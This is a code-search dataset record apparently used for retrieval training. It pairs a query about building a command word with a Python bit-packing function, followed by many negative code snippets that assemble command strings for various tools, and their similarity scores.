[ "0.8269675", "0.8154287", "0.8153167", "0.80855244", "0.8006094", "0.79054296", "0.7893724", "0.78821623", "0.7875023", "0.7869494", "0.7866777", "0.7866777", "0.7866777", "0.7866019", "0.78544617", "0.7850683", "0.78433925", "0.7838268", "0.78342485", "0.78307635", "0.7823101", "0.7819416", "0.7819416", "0.7819416", "0.7816135", "0.7814955", "0.7811713", "0.7811713", "0.77994037", "0.7792554", "0.77883893", "0.77883893", "0.77883255", "0.77812296", "0.77754956", "0.77638996", "0.7754212", "0.7753095", "0.7748186", "0.7747585", "0.77473444", "0.77465373", "0.774455", "0.774455", "0.7742595", "0.7739998", "0.77368873", "0.7734926", "0.77340084", "0.77327657", "0.7732009", "0.7730109", "0.7725966", "0.77212334", "0.77212334", "0.77212334", "0.77212334", "0.77212334", "0.7704349", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.77008015", "0.770007", "0.7688527", "0.76761997", "0.7674924", "0.7673494", "0.7672459", "0.76717615", "0.76684207", "0.7661512", "0.76601136", "0.76555705", "0.7643266", "0.76423395", "0.764077", "0.7638095", "0.7635131", "0.76309025", "0.762915", "0.7628067", "0.7623846", "0.7619813", "0.7619813", "0.7617029", "0.7615162" ]
0.77235234
53
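This row's document and nearly all of its negatives repeat the same try/except around sqlite3.connect. A minimal stdlib-only sketch of the same idea as a context manager, so the connection is always closed even on error; the "example.db" filename is a placeholder:

import sqlite3
from contextlib import contextmanager

@contextmanager
def open_connection(db_file):
    """Yield a SQLite connection and close it even if the caller raises."""
    conn = sqlite3.connect(db_file)
    try:
        conn.row_factory = sqlite3.Row  # dict-like rows, as several negatives set up
        yield conn
    finally:
        conn.close()

# Usage sketch; the filename is a placeholder.
with open_connection("example.db") as conn:
    conn.execute("CREATE TABLE IF NOT EXISTS demo (id INTEGER PRIMARY KEY)")
    conn.commit()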
Start a thread and consume messages there.
def async_consume(self, callback, auto_ack=False): logging.info("Async consume") if self.thread is not None: return self.thread_stop = False def wrapped_callback(ch, method, properties, body): #logging.info("Wrapped callback'd") callback(ch, method, properties, body) #if not self.thread_stop: # callback(ch, method, properties, body) #else: # print("Should stop now!") # callback(ch, method, properties, body) # self.channel.basic_cancel(self.tag) # exit self.thread = threading.Thread(target=self.consume, args=(wrapped_callback,), kwargs={"auto_ack":auto_ack}) self.thread.start()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def start_thread(self):\n self.thread = Thread(target=self.put_lines_into_queue)\n self.thread.daemon = True\n self.thread.start()", "def start(self):\n\n def pubsub_thread():\n \"\"\" Call get_message in loop to fire _handler. \"\"\"\n\n while not self._stop.is_set():\n self._pubsub.get_message()\n sleep(0.01)\n\n # subscribe to personal channel and fire up the message handler\n self._pubsub.subscribe(**{'actor:%s' % self.uuid: self._handler})\n self._proc = Thread(target=pubsub_thread)\n self._proc.daemon = True\n self._proc.start()", "def do_start(self):\n threading.Thread(group = None, \n target = self._subscribe_message, name = \"RabbitMQSubscribeThread\") .start()\n threading.Thread(group = None, \n target = self._publish_message, name = \"RabbitMQPublishThread\").start()", "def run(self):\n self.thread_send.start()\n self.thread_receive.start()", "def start(self):\n if self._chan is not None:\n try:\n self._chan.start_consume()\n except ChannelError:\n log.info('Subscriber is already started')\n\n else:\n self.gl = spawn(self.listen)", "def start_background_thread(self):\n self.runner = Runner(queue=queue, app_id=self.app_id)\n self.runner.start()\n # TODO: stop the thread at some point?", "async def start(self):\n\n while True:\n try:\n data = await self.reader.read(8192)\n\n if self._trace_enabled:\n self._logger.trace(\n \"Received %d bytes from remote server:\\n%s\",\n len(data),\n msg.dump(data),\n )\n await self.process(data)\n except asyncio.CancelledError:\n return\n except:\n logging.exception(\"Unhandled error in Message Reader\")\n raise", "def start(self):\n self._setup_thread()\n self.thread.start()", "def start(self):\n self.thread.start()", "def run(self):\n t = Thread(target=self._listen)\n t.start()", "def start(self):\n self._thread.start()", "def start_thread(self):\n self.stop_thread()\n self.running = True\n self.run_thread = threading.Thread(target=self.run, daemon=True)\n self.run_thread.start()", "def start(self):\n self.has_event = False\n self.running = True\n self._condition.acquire()\n self._thread = threading.Thread(target=read_input, args=(self,))\n self._thread.start()", "def _start_in_thread(self):\n return spawn_waitready(self._listen, self.start)[0]", "def run(self):\n receiver = threading.Thread(target=self.receive_data)\n # Setting daemon to True means that this Thread will be terminated when the main program ends.\n receiver.daemon = True\n receiver.start()", "def start(self):\n\n if self.thread is None:\n self.thread = threading.Thread(\n target=self.__run__,\n daemon=True,\n )\n\n self.thread.start()\n LOGGER.debug(\n \"Starting thread `%s` for event loop `%s`.\",\n self.ident,\n self.thread.ident,\n )", "def start_consuming(self, channel, rx_queue_name):\n if self.should_stop():\n logger.info(\"ready to stop, pause to consume\")\n return\n logger.info('Issuing consumer related RPC commands')\n self._consumer_tag = channel.basic_consume(\n self.on_message, rx_queue_name, auto_ack = False)\n channel.start_consuming()", "def start_read_thread(self):\r\n\r\n if self._connected:\r\n self._reading = True\r\n self._serial_thread = Thread(target=self._read_thread, daemon=True)\r\n self._serial_thread.start()", "def start_new_thread(self, conn, addr):\n thread = ClientThread(conn, addr, self.msg_queue)\n thread.start()\n return thread", "def start(self):\n\n\t\twhile True:\n\t\t\tinputReady, outputReady, exceptReady = select.select(\n\t\t\t\t[self.s],\n\t\t\t\t[],\n\t\t\t\t[],\n\t\t\t\t3\n\t\t\t)\n\n\t\t\t# Ready for receiving\n\t\t\tif 
len(inputReady) > 0 and inputReady[0] == self.s:\n\t\t\t\t# Read lines until input buffer is empty\n\t\t\t\tfor line in self.receiveLines():\n\t\t\t\t\tif len(line) > 0:\n\t\t\t\t\t\tprint(line)\n\n\t\t\t\t\tself.handle(line)\n\n\t\t\t# Only send if there is something to send\n\t\t\tif not self.outQueue.empty():\n\t\t\t\tm = self.outQueue.get_nowait()\n\n\t\t\t\tprint(\"Sending '{}'\".format(m.rstrip(\"\\r\\n\")))\n\t\t\t\tself.s.send(bytes(m, \"utf-8\"))\n\t\t\t\tself.outQueue.task_done()", "def start(self):\n \n self.keep_running = True\n self.th = threading.Thread(target=self.sendData)\n self.th.daemon = True # Thread will terminate with the main\n self.th.start()\n self.th.join(0)", "def start_speaking(self):\n self.allowed_to_chat = True\n self.chat_message_queue.clear()\n self.chat_thread = threading.Thread(target=self._process_chat_queue,\n kwargs={'chat_queue': self.chat_message_queue})\n self.chat_thread.daemon = True\n self.chat_thread.start()", "def start(self):\r\n monitor_thread = Thread(target = self.monitor)\r\n monitor_thread.setDaemon(True)\r\n monitor_thread.start()\r\n\r\n main_thread = Thread(target = self.run)\r\n main_thread.setDaemon(True)\r\n main_thread.start()", "def listen(self):\n self.processor_thread = Thread(target = self.event_loop, name=\"InputThread-\"+str(self.thread_index), args=(self.thread_index, ))\n self.thread_index += 1\n self.processor_thread.daemon = True\n self.processor_thread.start()", "def start_reader(self):\n # if already started, return immediately\n if self.running:\n return\n\n # construct a new reader & start it\n self.reader = threading.Thread(target = self.read_data)\n self.reader.start()", "def start(self) -> None:\n self.stopping.clear()\n self.thread = threading.Thread(target=self._run, daemon=True, name=self.thread_name)\n self.thread.start()", "def start(self):\n gv.logger.info(\"Started playing new playlist\")\n thread = Thread(target=self.run, args=())\n thread.daemon = True\n self.thread = thread\n thread.start()", "def start(self):\n waiting_for_clients = Thread(target=self.accept_client)\n waiting_for_clients.start()", "def listen(self):\n self.channel.start_consuming()", "def start(self):\n \n self.thread.start()\n self.state = \"running\"", "def start(self):\r\n start_thread(self._extract_thread_func, \"message sorter thread\")\r\n self.debug(\"### initialized stream sorter with %g s time window\"\r\n % (self.delay))", "def start(self) -> None:\n start_thread(super().start, self.__class__.__name__)", "def run(self):\n self.channel.queue_declare(self._request_queue)\n self.channel.basic_consume(self._request_queue, self.on_message)\n try:\n msg = \"Waiting for message ...\"\n print(msg)\n logging.info(msg)\n self.channel.start_consuming()\n except KeyboardInterrupt:\n self.channel.stop_consuming()\n\n self.connection.close()", "def start_pull_thread(self):\r\n threading.Thread(target=self._pull_thread).start()", "def start_consuming(self):\n logger.info('Issuing consumer related RPC commands')\n self.add_on_cancel_callback()\n logger.info(\"[{}] Waiting for messages on exchange {}\".format(self.bot_id, self.exchange))\n self._consumer_tag = self._channel.basic_consume(self.on_message,\n self.queue_name)", "def run(self) -> None:\n while self.data_incoming or len(self._queue):\n if not self._queue:\n logging.info(\"Consumer %d is sleeping since queue is empty\", self._name)\n time.sleep(0.75)\n print(self._queue.get())\n time.sleep(0.5)", "def startReading(self):\n self.reading = True\n self.thread = ReadSocket(self)\n 
self.thread.start()", "def start_consuming(self):\n # LOGGER.info('Issuing consumer related RPC commands')\n if self._init_ok_ctrl and self._init_ok_task:\n self._channel_ctrl.add_on_cancel_callback(self.on_consumer_ctrl_cancelled)\n self._channel_task.add_on_cancel_callback(self.on_consumer_task_cancelled)\n self._consumer_tag_task = self._channel_task.basic_consume(\n self.queue_task,\n auto_ack=False,\n on_message_callback=self.on_message\n )\n self._consumer_tag_ctrl = self._channel_ctrl.basic_consume(\n self._topic_queue_name,\n auto_ack=False,\n on_message_callback=self.on_topic\n )\n self.was_consuming = True\n self._consuming = True", "def pubsub_thread():\n\n while not self._stop.is_set():\n self._pubsub.get_message()\n sleep(0.01)", "def run(self):\n log.info(\"Starting thread\")\n if self.open_listener():\n\n # This feels so dirty, but we need to make sure the thread isn't always blocking so we\n # can safely shutdown the thread. Given that the Listener address is always an IP\n # it should be safe. Should be, famous last words of course...\n conn = self.listener._listener._socket\n\n while self.running:\n r_list, w_list, e_list = select.select([conn, ], [conn, ], [conn, ], 0.01)\n\n if conn in r_list:\n connection = None\n try:\n connection = self.listener.accept()\n log.info(\"Connection opened by %s\", self.listener.last_accepted)\n\n while self.running:\n if connection.poll():\n msg = connection.recv()\n globals.strip_data.spi_recv(msg)\n except (IOError, EOFError):\n if connection:\n connection.close()\n log.info(\"Connection closed %s\", self.listener.last_accepted)\n\n log.info(\"Exiting thread\")", "def start_thread(self) -> threading.Thread:\n assert self._thread is None, \"Thread has already been created.\"\n\n self._thread = threading.Thread(target=self.start)\n self._thread.start()\n return self._thread", "def start(self):\n\n self.__thread = Thread(target=self.run, name=self.name)\n self.__thread.daemon = True\n self.__thread.start()\n\n return self.__thread, None", "def start(self):\n listening_thread = Thread(\n target=self.sock.start_listening, daemon=True)\n listening_thread.start()\n sending_thread = Thread(target=self.sock.start_sending, daemon=True)\n sending_thread.start()\n\n ack_watch_thread = Thread(target=self.watch_for_acks, daemon=True)\n ack_watch_thread.start()\n\n ack_timeout_thread = Thread(\n target=self.watch_for_ack_timeout, daemon=True)\n ack_timeout_thread.start()\n\n self.report()", "def create_listen_thread(self):\n self.listen_thread = threading.Thread(target=self.listen, daemon=True)\n self.listen_thread.start()\n print('Started listener thread')", "def start(self):\n self.sender.start()\n self.receiver.start()", "def start(self):\n self.sender.start()\n self.receiver.start()", "def start_consuming(self):\n self.logger.debug(\"Issuing consumer related RPC commands\")\n\n self._channel.basic_qos(prefetch_count=self._max_concurrent)\n self._channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\n consume_kwargs = {\"queue\": self._queue_name}\n if PIKA_ONE:\n consume_kwargs[\"on_message_callback\"] = self.on_message\n else:\n consume_kwargs[\"consumer_callback\"] = self.on_message\n\n self._consumer_tag = self._channel.basic_consume(**consume_kwargs)", "def startReceiving(self):\n self.listening = True\n self.start()", "def _begin_consuming(self):\n self._consuming = True\n loop = asyncio.get_event_loop()\n self._message_queue = asyncio.Queue(\n maxsize=self.app.settings['SQS_PREFETCH_LIMIT'],\n loop=loop,\n )\n 
loop.create_task(self._consume())", "def start(self):\n self.stop_recognising.clear()\n self.thread.start()", "def run(self):\n while True:\n msg = self.recv()", "def stdin_thread(self):\n while True:\n if not self.is_running():\n time.sleep(0.1)\n continue\n msg = self._stdin_queue.get()\n if msg is None:\n break # Ask to stop\n self._say(msg)", "def start(self) -> None:\n conn_manager = ConnectionManager(broker_host=self.broker_host, queue=self.queue)\n channel = conn_manager.start_channel()\n channel.basic_consume(queue=self.queue, on_message_callback=self.callback)\n\n try:\n print(\"PV Simulator...\")\n channel.start_consuming()\n except KeyboardInterrupt:\n pass", "def connect_thread(self, *args, **kwargs):\r\n thread = threading.Thread(target=self.connect_stream, args=args, kwargs=kwargs)\r\n thread.daemon = True\r\n thread.start()\r\n return thread", "def run(self):\n self.thread = threading.Thread(target=self._main)\n self.thread.start()\n self.running = True", "def start(self):\n\n # Start listening for records\n self._run_loop(True)\n # There might still be records in the queue.\n self._run_loop(False)", "def _start_loop(self):\n self.p = tread.Thread(target=self._loop)\n self.p.start()", "def run(self):\n self.listen(self.input_topics.filter_by(transmission='tcp'))\n\n logging.info('Getting into the listening loop')\n self.running = True\n while self.running:\n self.loop()", "def start(self):\n self.socket_manager.start()\n\n if self.poc != None:\n self._start_thread(self.contact_poc, daemon=True)\n self.send_discovery_message(self.poc)\n self._start_thread(self.watch_for_discovery_messages, daemon=True)\n self._start_thread(self.watch_for_heartbeat_messages, daemon=True)\n self._start_thread(self.send_heartbeat_messages, daemon=True)\n self._start_thread(self.watch_for_heartbeat_timeouts, daemon=True)\n self._start_thread(self.watch_for_rtt_messages, daemon=True)\n self._start_thread(self.calculate_rtt_timer, daemon=True)\n self._start_thread(self.watch_for_app_messages, daemon=True)\n\n while True: # Blocking. 
Nothing can go below this\n self.check_for_inactivity()", "def start(self):\n return self._thread.start()", "def start(self) -> None:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n self.wserver = websockets.serve(self.__producer_handler, port=self.port, loop=loop)\n try:\n # run server forever\n self.server = asyncio.get_event_loop()\n self.server.run_until_complete(self.wserver)\n self.server.run_forever()\n except Exception:\n self.close()\n\n loop.run_forever()", "def on_run(self):\n wxMediator.on_run(self)\n listener_evt = InterThreadEventWX(self,\n wxEVT_NEW_LISTEN_CONN) \n talker_evt = InterThreadEventWX(self,\n wxEVT_NEW_TALK_CONN) \n server = self.server()\n sys.stderr.write('Starting server threads...\\n')\n sys.stderr.flush()\n server.start_other_threads(listener_evt, talker_evt)", "def start(self, receive_callback):\n if self.socket is not None:\n Thread(target = self._send).start()\n Thread(target = self._receive, args = (receive_callback,)).start()", "def receive_incoming_messages_thread(self):\n\n def on_error(partition_context, error):\n logger.error(\"EventHub on_error: {}\".format(str(error) or type(error)))\n\n def on_partition_initialize(partition_context):\n logger.warning(\"EventHub on_partition_initialize\")\n\n def on_partition_close(partition_context, reason):\n logger.warning(\"EventHub on_partition_close: {}\".format(reason))\n\n def on_event(partition_context, event):\n reset_watchdog()\n if event:\n self.executor.submit(self.dispatch_incoming_message, event)\n\n logger.info(\"Starting EventHub receive\")\n with self.eventhub_consumer_client:\n self.eventhub_consumer_client.receive(\n on_event,\n on_error=on_error,\n on_partition_initialize=on_partition_initialize,\n on_partition_close=on_partition_close,\n max_wait_time=30,\n )", "def start(self):\n self.stream.start()\n self.running = True\n self.update()", "def start(self):\n\n self.keep_running = True # Set running flag to true\n self.th = threading.Thread(target=self.listenSocket)\n self.th.daemon = True # Thread will terminate with the main\n self.th.start()\n self.th.join(0)", "def run(self):\n self.logger.info(\"Starting messenger.\")\n self.recv()", "def run(self):\n\n self.make_connection()\n self.channel()\n self.declare_queue()\n self.publish_message()\n self.close_connection()", "def run(self):\n self.logger.info(\"starting Dashi consumer\")\n while not self.shutdown:\n self.rpc.listen()", "def _run_monitor_thread(self):\n while True:\n chunk = self.stream.read(1024)\n if not chunk:\n # EOF - subprocess has exited, so trigger shutdown\n trigger_exit(ExitMode.CHILD)\n break\n self.output_deque.appendleft(chunk)", "def starting(self):\n ident = self.ident()\n print('{} starting & consuming \"{}\".'.format(ident, self.to_consume))\n\n if self.max_tasks:\n print('{} will die after {} tasks.'.format(ident, self.max_tasks))\n else:\n print('{} will never die.'.format(ident))", "def start(self) -> None:\n self.should_exit = False\n self._main_thread = threading.Thread(target=self._wrap_start, daemon=True)\n self._main_thread.start()", "def start_socket_thread(self):\n self.socket_thread = BCPServer(self, self.receive_queue,\n self.sending_queue)\n self.socket_thread.daemon = True\n self.socket_thread.start()", "def run(self):\n t = threading.Thread(target=self._thread_action,\n args=(self._sensor_queue,))\n t.daemon = True\n t.start()", "def run(self):\n while True:\n line = self.stream.readline()\n if not len(line):\n # EOF, stop!\n break\n else:\n # Put the text on the queue, along 
with the time it was read.\n self.callback_queue.put(line)", "def start(self):\n self._do_work.set()\n self._worker_thread.start()", "def run(self):\n if self.init():\n while not self._stop.value:\n try:\n sockets = dict(self.poll.poll(100))\n if (self.sock_reply in sockets and\n sockets[self.sock_reply] == zmq.POLLIN):\n request = self.sock_reply.recv_multipart()\n # do some 'work', update status\n cmd = loads(request[0])\n self.running = 1\n self.coroutine.run(cmd)\n self.running = 0\n self.nb_job_done += 1\n # send reply back to router/queuer\n self.sock_reply.send_multipart(request)\n\n except Exception as e:\n self.log.error('CONSUMER exception {}'.format(e))\n break\n self.sock_reply.close()\n self.finish()\n self.done = True", "def join(self):\n self.consumer.pause()\n try:\n self.consumer.join()\n # This can raise if the consumer thread was never started\n except RuntimeError:\n pass", "def start(self, file_service):\n self.is_reading_lock = threading.Lock()\n self.read_thread = threading.Thread(\n target=self._read, args=(file_service,))\n self.read_thread.start()", "def message_handler(self, msg):\n thread = threading.Thread(target=self.answer, args=(msg,))\n thread.start()\n return thread", "def run(self):\n\n\t\t#Begin running the clientHandler\n\t\tself.running = True\n\t\tself.rxThread.start()\n\n\t\twhile self.running:\n\t\t\ttime.sleep(0.1)\n\t\n\t\t\t#Keep a count of the number of missing Hello requests, over 5 kill client\n\t\t\tif self.missingCount >= 5:\n\t\t\t\tself.running = False", "def start(self):\n state_thread = threading.Thread(target=self._parse_block_queue)\n state_thread.daemon = True\n state_thread.start()", "def __init__(self, stream):\n self.stream = stream\n self.queue = Queue()\n self.start_thread()", "def start(self):\n self.capturing = True\n print \"Connecting Sender\"\n self.sock.connect(self.addr)\n self.capture_thread.start()\n print \"Starting Sender\"\n self.sending_thread.start()", "def run(self):\n self.log.info(\"Starting thread: \" + self.name)\n self.object__ = self.run_process(self.object__, self.args)", "def run(self):\n while True:\n # Check to see if we should stop\n if self._stop.isSet():\n logger.debug(\"Worker thread stopping.\")\n break\n\n # Try to pull from the queue\n try:\n func, args, kwargs = self.queue.get_nowait()\n func(*args, **kwargs)\n except Queue.Empty:\n time.sleep(5)\n continue\n except Exception as e:\n logger.exception(e)", "def background(self):\n self.thread = threading.Thread(target=self.run)\n self.thread.setDaemon(True)\n self.thread.start()", "def start(self, *args, **kwargs):\n\n self.queue = Queue()\n thread = Thread(target=self._threaded, args=args, kwargs=kwargs)\n thread.start()\n\n return Asynchronous.Result(self.queue, thread)", "def _start_receive_from_queue(self):\n while True:\n received_message = recv_msg(self.TCPSock)\n # received_message = self.TCPSock.recv(self.buf)\n if self.verbose: print \"Server sends: \" + received_message\n self.receive_message_queue.put(received_message)", "def run(self):\n watcher = self._watcher(self.on_recv)\n watcher.loop()", "def work(self):\n while True:\n message = self.get()\n self.handle(message)", "def start_work(self):\n self.worker_thread = WorkerThread(self.feedback_log, self.job_list) # only created when processing begins. 
May be recreated\n self.worker_thread.daemon = True\n self.worker_thread.start()", "def startMP(self):\n for w in self.consumers:\n w.start()", "def Start(self):\n for unused_i in range(0, self.args.message_count):\n self.CallClient(\n standard.ReadBuffer, offset=0, length=100, next_state=\"Process\")", "def start_thread():\n global gIt, gOt, gRunning\n gRunning = True\n gIt = Thread(target = input_thread)\n gIt.start()\n gOt = Thread(target = output_thread)\n gOt.start()", "def start(self):\r\n thread = threading.Thread(target=self.run)\r\n try:\r\n thread.start()\r\n except RuntimeError as e:\r\n raise SchedulerError(f\"Failed to start worker '{self.WORKER_ID}': \" + str(e))", "def listen(self):\n print \"starting server thread with address \" + str(self.address)\n server_thread = ServerThread(self.address, self.response_queue, self.queue_lock, self.on_message_received)\n server_thread.start()\n self.connected_as_server = True # TODO only if successful", "def run(self) -> None:\n with ThreadPoolExecutor(max_workers=self.maxworkers) as ex:\n ex.submit(self._producer)\n ex.submit(self._consumer)\n self._q.join()", "def start_consuming(self):\n\n for queue in self._handlers.keys():\n self._consumer_tags += self._channel.basic_consume(self.on_message,\n queue=queue)", "def _ensure_thread(self) -> None:\n\n if not self._thread:\n thread = self._thread_factory(self.run)\n self._thread = thread\n thread.start()", "def run(self):\n try:\n\n self._connection = self.connect()\n self._connection.ioloop.start()\n except (KeyboardInterrupt, SystemExit):\n self.stop()\n except Exception as e:\n logger.warn(\"Exception: %s\", str(e))\n logger.warn(\"Exception caught on rabbit consumer for process: %s with consumer id %s\", threading.current_thread, str(self.consumer_id))\n self.internal_error_queue.put(self.consumer_id)" ]
[ "0.71411765", "0.6965287", "0.68307364", "0.6813745", "0.6759223", "0.66143614", "0.65682524", "0.6550619", "0.65052104", "0.64535457", "0.6452136", "0.6439701", "0.6390061", "0.63585454", "0.6282679", "0.6282162", "0.62618804", "0.6250061", "0.6245712", "0.6242766", "0.622399", "0.6206326", "0.6204722", "0.6193995", "0.6181676", "0.6163639", "0.6150385", "0.61503434", "0.6138435", "0.6129089", "0.6128222", "0.61251795", "0.6116055", "0.61088544", "0.6097712", "0.60808325", "0.60762924", "0.60756946", "0.605868", "0.6048956", "0.6046768", "0.6046507", "0.6033856", "0.6033352", "0.6027065", "0.6027065", "0.60226953", "0.6015154", "0.6013997", "0.59925014", "0.59849495", "0.59828776", "0.5979823", "0.5975299", "0.5973039", "0.59724534", "0.59717244", "0.59460646", "0.5934322", "0.5907122", "0.587836", "0.5877566", "0.5874615", "0.58597827", "0.58594173", "0.58568466", "0.5854173", "0.5846509", "0.5829034", "0.5827151", "0.582091", "0.58202505", "0.5819243", "0.5818565", "0.5802302", "0.57993823", "0.579789", "0.57921237", "0.57908684", "0.577979", "0.5778772", "0.577145", "0.576162", "0.5738855", "0.57302797", "0.5719021", "0.57096756", "0.5707352", "0.57046807", "0.5703478", "0.5697589", "0.5690435", "0.5679775", "0.56684136", "0.56445885", "0.56428826", "0.56262416", "0.5625848", "0.56195116", "0.56108665", "0.560908" ]
0.0
-1
Build the command word. Note
def get_cmd_word(cmd, d_width, d_length):
    word = 0x1                          # cmd valid
    word = word | (d_width - 1) << 1    # cmd dataWidth (3->4B, 1->2B, 0->1B)
    word = word | cmd << 3              # cmd type (1->RD, 0->WR)
    word = word | d_length << 8         # cmd burst length (1->1 word)
    word = word | 0 << 16               # unused
    return word
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _build_command(self, cmd, unit):\n return '#' + unit + cmd + NEWLINE", "def _build_simple_command(self, cmd):\n return cmd+SBE37_NEWLINE", "def _build_direct_command(self, cmd, arg):\n return \"%s%s\" % (arg, self._newline)", "def _buildCmd(self, cmd, cmdArg=0x00):\n res = [cmd, cmdArg]\n if self.USE_SUFFIX:\n return res + [self.CMD_SUFFIX]\n return res", "def build_command_string(self):\n if self._regex_helper.search_compiled(W._re_h, self.options):\n if self._regex_helper.group(\"SOLO\"):\n self.options = self.options.replace('-h', '')\n else:\n self.options = self.options.replace('h', '')\n\n cmd = \"{} {}\".format(\"w\", self.options)\n else:\n cmd = \"{}\".format(\"w\")\n return cmd", "def _build_solo_command(self, cmd):\n return COMMAND_CHAR[cmd]", "def _build_command(self, command_name, hardware_address = '', comp_var_dict = None):\n # Start command adn set name\n command = \"<Command><Name>{command_name}</Name>\".format(command_name=command_name)\n\n if hardware_address:\n command += \"<DeviceDetails><HardwareAddress>{hardware_address}</HardwareAddress></DeviceDetails>\".format(hardware_address=hardware_address)\n\n if comp_var_dict is not None:\n comp_keys = comp_var_dict.keys()\n if len(comp_keys) > 0:\n for comp_key in comp_keys:\n # Build requested variable list\n command += \"<Components><Component><Name>{comp_key}</Name><Variables>\".format(comp_key=comp_key)\n variables = comp_var_dict[comp_key]\n for var in variables:\n command += \"<Variable><Name>{var}</Name></Variable>\".format(var=var)\n command += \"</Variables></Component></Components>\"\n else:\n # Request all variables from all components\n command += \"<Components><All>Y</All></Components>\"\n\n # Close command\n command += \"</Command>\"\n \n return command", "def buildCmd( tcmpCmd, cmd, target, sequence, fieldList):\n cmdList = [tcmpCmd, cmd, target, sequence, fieldList]\n\n return \"<{cmd}>\".format(cmd=\":\".join(cmdList))", "def command_create(self):\n command = []\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['pre_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n command.extend(self.pre_chth)\n command.append(Template('@CMD_BEGIN@ $short_name').substitute(self.shell_dict))\n command.extend(self.tool_chth)\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['post_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n\n return '\\n'.join(command)", "def _build_menu_command(self, cmd):\n if COMMAND_CHAR[cmd]:\n return COMMAND_CHAR[cmd]+self._newline\n else:\n raise InstrumentProtocolException(\"Unknown command character for %s\" % cmd)", "def buildCommand(self, kwargs):\r\n self.command = \"\"\r\n try:\r\n if not self.isEnabled():\r\n return\r\n except Exception, e:\r\n print \"<ERROR>\", e\r\n return\r\n self.command = self.app\r\n \r\n \r\n \r\n # filename should be last in the command, so iterate again\r\n for key in kwargs:\r\n if key == 'filename':\r\n if type(kwargs[key]) == str:\r\n f = kwargs[key]\r\n if os.path.exists(f):\r\n self.command += \" \" + str(f)\r\n else:\r\n self.command = \"\"\r\n raise Exception, \"File does not exist!\"\r\n else:\r\n self.command = \"\"\r\n raise Exception, \"File needs to be a string.\"", "def __cmd_builder(self):\n self.cmd = 'python -m lizard \"%s\" ' % self.get_proj_path()\n args = \"\"\n if self.get_cyclo_args():\n args = self.get_cyclo_args()\n exclude = \",\".join(str(x) for x in self.get_cyclo_exclude() if x is not None)\n if exclude:\n exclude = ','.join(' -x 
\"{0}\"'.format(w) for w in exclude.rstrip().split(','))\n self.cmd = self.cmd + args + \" \" + exclude + \" --csv\"\n print(self.cmd) # pragma: no mutate", "def buildCommandModel ( switchSpecs, posSpecs ):\n\n #-- 1 --\n result = []\n\n #-- 2 --\n # [ result +:= strings representing the options in switchSpecs ]\n for switch in switchSpecs:\n result.append ( \"-%s\" % switch.letter )\n\n #-- 3 --\n # [ result +:= strings representing the keys in posSpecs ]\n for pos in posSpecs:\n if pos.optional:\n result.append ( \"[%s]\" % pos.key )\n else:\n result.append ( pos.key )\n if pos.repeated:\n result.append ( \"...\" )\n\n #-- 4 --\n # [ return the concatenation of the strings in result with single\n # spaces between them ]\n return \" \".join ( result )", "def generate_command_string(self, operation, *args, **kwargs):\n cmd = [self.terraform_binary_path, operation]\n\n for key, value in kwargs.items():\n if key == \"var\":\n for varkey, varval in value.items():\n option = \"-var=\"\n option += \"'%s=%s'\" % (varkey, varval)\n cmd.append(option)\n else:\n option = \"\"\n if \"_\" in key:\n key = key.replace(\"_\", \"-\")\n\n if value == \"IsFlag\":\n option = \"-%s\" % key\n else:\n option = \"-%s=%s\" % (key, value)\n cmd.append(option)\n\n if len(args) > 0:\n for arg in args:\n cmd.append(arg)\n\n return \" \".join(cmd)", "def build_command(self) -> typing.Optional[str]:\n return self._values.get(\"build_command\")", "def build_command(self) -> typing.Optional[str]:\n return self._values.get(\"build_command\")", "def build_command(self) -> typing.Optional[str]:\n return self._values.get(\"build_command\")", "def _build_send_optode_command(self, cmd, command):\n return \"%s=%s%s\" % (cmd, command, self._newline)", "def _BuildCommand(self, command_name, parameter_files=None, **kwargs):\n command = [YCSB_EXE, command_name, self.database]\n\n parameters = self.parameters.copy()\n parameters.update(kwargs)\n\n # Adding -s prints status which includes average throughput per sec.\n if _THROUGHPUT_TIME_SERIES.value and command_name == 'run':\n command.append('-s')\n parameters['status.interval'] = _STATUS_INTERVAL_SEC\n\n # These are passed as flags rather than properties, so they\n # are handled differently.\n for flag in self.FLAG_ATTRIBUTES:\n value = parameters.pop(flag, None)\n if value is not None:\n command.extend(('-{0}'.format(flag), str(value)))\n\n for param_file in list(self.parameter_files) + list(parameter_files or []):\n command.extend(('-P', param_file))\n\n for parameter, value in parameters.items():\n command.extend(('-p', '{0}={1}'.format(parameter, value)))\n\n return 'cd %s && %s' % (YCSB_DIR, ' '.join(command))", "def makecmd(self, options):", "def gen_command(process):\n cmd = \"{} \".format(process.name)\n for o in process.options.opt_list:\n i = 0\n opt = \"\"\n for el in o: \n if el and el != \"input\" and el != \"output\" and i != 3:\n opt += str(el)\n if opt[-1] != \"=\" and opt[-1] != \"'\": # command without space\n opt += \" \" # space\n i += 1\n cmd += opt\n return cmd", "def _build_command(self, code_command):\n if code_command == 'end':\n return roboc_command.RobocCommandExit()\n elif code_command[0] == 'E':\n return roboc_command.RobocMoveEast(int(code_command[1:]))\n elif code_command[0] == 'W':\n return roboc_command.RobocMoveWest(int(code_command[1:]))\n elif code_command[0] == 'S':\n return roboc_command.RobocMoveSouth(int(code_command[1:]))\n elif code_command[0] == 'N':\n return roboc_command.RobocMoveNorth(int(code_command[1:]))\n else:\n 
